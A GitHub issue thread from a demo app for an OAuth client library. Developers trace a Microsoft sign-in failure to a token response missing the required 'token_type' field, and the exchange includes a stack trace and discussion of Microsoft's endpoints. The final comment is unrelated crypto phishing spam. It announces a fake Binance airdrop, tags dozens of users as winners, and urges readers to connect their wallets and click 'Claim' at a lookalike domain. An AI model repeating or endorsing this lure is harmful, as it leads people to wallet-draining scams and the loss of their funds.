### ISSUE TITLE
Microsoft sign in broken

### ISSUE THREAD

**Issue by gabrielittner** [iainmcgin/AppAuth-Demo#1]
When using the Microsoft sign in I'm getting a "Token refresh failed" snackbar. The AuthorizationException looks like this

```
W: AuthorizationException: {"type":0,"code":5,"errorDescription":"JSON deserialization error"}
W:     at net.openid.appauth.AuthorizationService$TokenRequestTask.onPostExecute(AuthorizationService.java:478)
W:     at net.openid.appauth.AuthorizationService$TokenRequestTask.onPostExecute(AuthorizationService.java:375)
W:     at android.os.AsyncTask.finish(AsyncTask.java:695)
W:     at android.os.AsyncTask.-wrap1(Unknown Source:0)
W:     at android.os.AsyncTask$InternalHandler.handleMessage(AsyncTask.java:712)
W:     at android.os.Handler.dispatchMessage(Handler.java:105)
W:     at android.os.Looper.loop(Looper.java:164)
W:     at android.app.ActivityThread.main(ActivityThread.java:6541)
W:     at java.lang.reflect.Method.invoke(Native Method)
W:     at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:240)
W:     at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:767)
W: Caused by: org.json.JSONException: field "token_type" not found in json object
W:     at net.openid.appauth.JsonUtil.getString(JsonUtil.java:171)
W:     at net.openid.appauth.TokenResponse$Builder.fromResponseJson(TokenResponse.java:216)
W:     at net.openid.appauth.AuthorizationService$TokenRequestTask.onPostExecute(AuthorizationService.java:475)
W: 	... 10 more
```

Does this also happen for you?

**Comment by iainmcgin** [comment]
It's been a while since I've tested the Microsoft integration, let me try it out and I'll get back to you.

**Comment by iainmcgin** [comment]
Microsoft seem to be returning an invalid response for the access code exchange request, which is missing the `token_type` field (which is [mandatory](https://tools.ietf.org/html/rfc6749#section-5.1), according to the OAuth2 spec). It's possible that the endpoints I'm using in this demo have changed; I'll compare it to the Microsoft docs.

**Comment by gabrielittner** [comment]
When I tried to integrate Microsoft sign in to my app I was following this [documentation](https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols-oauth-code). The documented response seems to be spec compliant. 
The two differences to your implementation are that the client secret isn't required anymore and that they support redirects with custom schemes (the default when adding a native app in the console is `msal[clientid]://auth`). Both won't fix the incomplete response though.

**Comment by iainmcgin** [comment]
Yeah, I'm also looking at [this documentation](https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-protocols-oauth-code) and the documented response there is spec compliant, but doesn't match what we're actually seeing - we only get a `refresh_token` and and `id_token` in the response, with no `access_token`. The absence of the `access_token` would explain why no `token_type` is described in the response, so perhaps I should be a little more tolerant of that, though the response is definitely not compliant with the OAuth2 spec.

I'll see if any of my contacts at Microsoft can help explain the change in behavior.

**Comment by selfissued** [comment]
This is a known issue in which Microsoft currently has an incomplete OpenID Connect implementation.  I'll plan to let you know once the issue has been addressed.  Thanks for writing about this.

**Comment by selfissued** [comment]
BTW, @gabrielittner - what was the path to the .well-known/openid-configuration document you were using when you experienced the problem?

**Comment by gabrielittner** [comment]
`https://login.microsoftonline.com/common/v2.0/.well-known/openid-configuration`
I've also tried using `https://login.microsoftonline.com/common/oauth2/v2.0/authorize` and `/token` directly without the discovery.

**Comment by gabrielittner** [comment]
@selfissued When requesting Microsoft Graph scopes it seems to work now, but when using scopes for the Outlook API like `https://outlook.office.com/calendars.readwrite.shared` instead of `Calendars.ReadWrite.Shared` I'm still seeing the issue.

**Comment by jmperezv** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @CyberFlameGO, @ShadowStar, @alebeck, @k-lpmg, @packmad, @rjammala, @oz, @ahsanz024, @jollychang, @yamashita-kenngo, @jinfatimay, @Yaoshicn, @dmgolembiowski, @mrjosh, @StevenGann, @raphaelcosta, @esafak, @fishi0x01, @ernesto-jimenez, @cachedout, @ambud, @winning1120xx, @singkorn, @talir0drigues, @panda912, @DBliuchengjie, @dafinley, @geduardcatalindev, @seanorama, @NanamiMio, @aaronsu, @srijanshukla18, @ZeroKill1024, @AnnaleaLayton, @wonderzdh, @Vivecstel, @ymt2, @joelhy, @Coolkids, @eddyvlad, @T1murY, @ifzm, @futuristudios, @UniqueJoy, @luke92, @aholowko, @bsmartt13, @mrtinkz, @GlenGithub, @XBeg9
